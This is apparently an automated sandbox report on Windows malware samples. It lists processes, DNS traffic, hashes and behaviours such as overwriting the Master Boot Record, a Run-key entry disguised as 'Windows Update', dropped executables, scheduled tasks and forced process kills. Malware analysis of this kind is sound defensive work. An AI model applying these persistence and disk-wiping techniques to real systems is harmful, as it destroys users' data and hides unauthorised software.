C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
memory/2228-9-0x0000000002FB0000-0x0000000002FB1000-memory.dmp
memory/3384-16-0x00000225E6B70000-0x00000225E6B90000-memory.dmp
memory/3384-18-0x00000225E6B30000-0x00000225E6B50000-memory.dmp
memory/3384-20-0x00000225E6F40000-0x00000225E6F60000-memory.dmp
memory/3568-32-0x0000000004F30000-0x0000000004F31000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\KERIKBO1\microsoft.windows[1].xml
| MD5 | 974f0adc8b3b7f482be95139c92926e0 |
| SHA1 | 635f5f7b6f1dda58dd4926f1600dce90652da52a |
| SHA256 | fc71f9b009579b4f8c03f646fca98084ed6133d4f2acc4103ea39c366518c771 |
| SHA512 | 27b57eec2e4da0c23cb6f7e173ac831a039c3c8a76dec063c8b23c2e1d90f2d52dc5916044a1cf09fd235439d28919d31e0eef3870374e682d1f07daac9960b2 |
memory/2264-40-0x00000202F8100000-0x00000202F8120000-memory.dmp
memory/2264-43-0x00000202F7DC0000-0x00000202F7DE0000-memory.dmp
memory/2264-45-0x00000202F84D0000-0x00000202F84F0000-memory.dmp
memory/3920-52-0x00000000045A0000-0x00000000045A1000-memory.dmp
memory/1556-60-0x00000155D9B10000-0x00000155D9B30000-memory.dmp
memory/1556-62-0x00000155D9AD0000-0x00000155D9AF0000-memory.dmp
memory/1556-64-0x00000155DA0E0000-0x00000155DA100000-memory.dmp
memory/4396-76-0x0000000002800000-0x0000000002801000-memory.dmp
memory/3616-84-0x00000157D20C0000-0x00000157D20E0000-memory.dmp
memory/3616-86-0x00000157D2080000-0x00000157D20A0000-memory.dmp
memory/3616-88-0x00000157D26E0000-0x00000157D2700000-memory.dmp
memory/2516-99-0x0000000002AE0000-0x0000000002AE1000-memory.dmp
memory/3632-107-0x000001937A390000-0x000001937A3B0000-memory.dmp
memory/3632-109-0x000001937A350000-0x000001937A370000-memory.dmp
memory/3632-111-0x000001937A760000-0x000001937A780000-memory.dmp
memory/3668-124-0x0000000004B10000-0x0000000004B11000-memory.dmp
memory/4332-132-0x000002EC8B480000-0x000002EC8B4A0000-memory.dmp
memory/4332-134-0x000002EC8B440000-0x000002EC8B460000-memory.dmp
memory/4332-137-0x000002EC8B850000-0x000002EC8B870000-memory.dmp
memory/1196-149-0x0000000004190000-0x0000000004191000-memory.dmp
memory/3616-156-0x000002AA5E220000-0x000002AA5E240000-memory.dmp
memory/3616-158-0x000002AA5DFE0000-0x000002AA5E000000-memory.dmp
memory/3616-161-0x000002AA5E5F0000-0x000002AA5E610000-memory.dmp
memory/4452-171-0x0000000003400000-0x0000000003401000-memory.dmp
memory/4852-179-0x000002DFF7F80000-0x000002DFF7FA0000-memory.dmp
memory/4852-181-0x000002DFF7F40000-0x000002DFF7F60000-memory.dmp
memory/4852-183-0x000002DFF8350000-0x000002DFF8370000-memory.dmp
memory/3480-195-0x0000000004F00000-0x0000000004F01000-memory.dmp
memory/4472-202-0x0000025F94740000-0x0000025F94760000-memory.dmp
memory/4472-204-0x0000025F94700000-0x0000025F94720000-memory.dmp
memory/4472-207-0x0000025F94B00000-0x0000025F94B20000-memory.dmp
memory/3112-217-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
memory/1520-225-0x0000015271140000-0x0000015271160000-memory.dmp
memory/1520-229-0x0000015271510000-0x0000015271530000-memory.dmp
memory/1520-227-0x0000015271100000-0x0000015271120000-memory.dmp
memory/4528-241-0x0000000004AA0000-0x0000000004AA1000-memory.dmp
memory/5060-249-0x000001C263660000-0x000001C263680000-memory.dmp
memory/5060-250-0x000001C263620000-0x000001C263640000-memory.dmp
memory/5060-252-0x000001C263A30000-0x000001C263A50000-memory.dmp
memory/3448-261-0x00000000040D0000-0x00000000040D1000-memory.dmp
memory/4436-269-0x0000019D8AEF0000-0x0000019D8AF10000-memory.dmp
memory/4436-272-0x0000019D8AEB0000-0x0000019D8AED0000-memory.dmp
memory/4436-275-0x0000019D8B4C0000-0x0000019D8B4E0000-memory.dmp
memory/2440-285-0x0000000002560000-0x0000000002561000-memory.dmp
memory/3800-292-0x000002068C240000-0x000002068C260000-memory.dmp
memory/3800-296-0x000002068C600000-0x000002068C620000-memory.dmp
memory/3800-294-0x000002068C200000-0x000002068C220000-memory.dmp
memory/3572-308-0x0000000004BE0000-0x0000000004BE1000-memory.dmp
memory/2924-315-0x000001E5352B0000-0x000001E5352D0000-memory.dmp
memory/2924-317-0x000001E535270000-0x000001E535290000-memory.dmp
memory/2924-319-0x000001E535880000-0x000001E5358A0000-memory.dmp
memory/1448-330-0x00000000028E0000-0x00000000028E1000-memory.dmp
memory/3292-338-0x000001492B5B0000-0x000001492B5D0000-memory.dmp
memory/3292-340-0x000001492B570000-0x000001492B590000-memory.dmp
memory/3292-342-0x000001492B980000-0x000001492B9A0000-memory.dmp
memory/392-353-0x0000000004E90000-0x0000000004E91000-memory.dmp
memory/4436-361-0x000002892CCA0000-0x000002892CCC0000-memory.dmp
memory/4436-363-0x000002892CC60000-0x000002892CC80000-memory.dmp
memory/4436-365-0x000002892D070000-0x000002892D090000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:36
Platform
win10v2004-20240226-en
Max time kernel
122s
Max time network
174s
Command Line
Signatures
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x314 0x368
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.178.10:443 | tcp | |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\Magix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\rgb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\snd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\gl1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\circle.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\F84A.tmp\\mbr.exe" | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe
"C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F84A.tmp\F85B.bat "C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe""
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat.exe
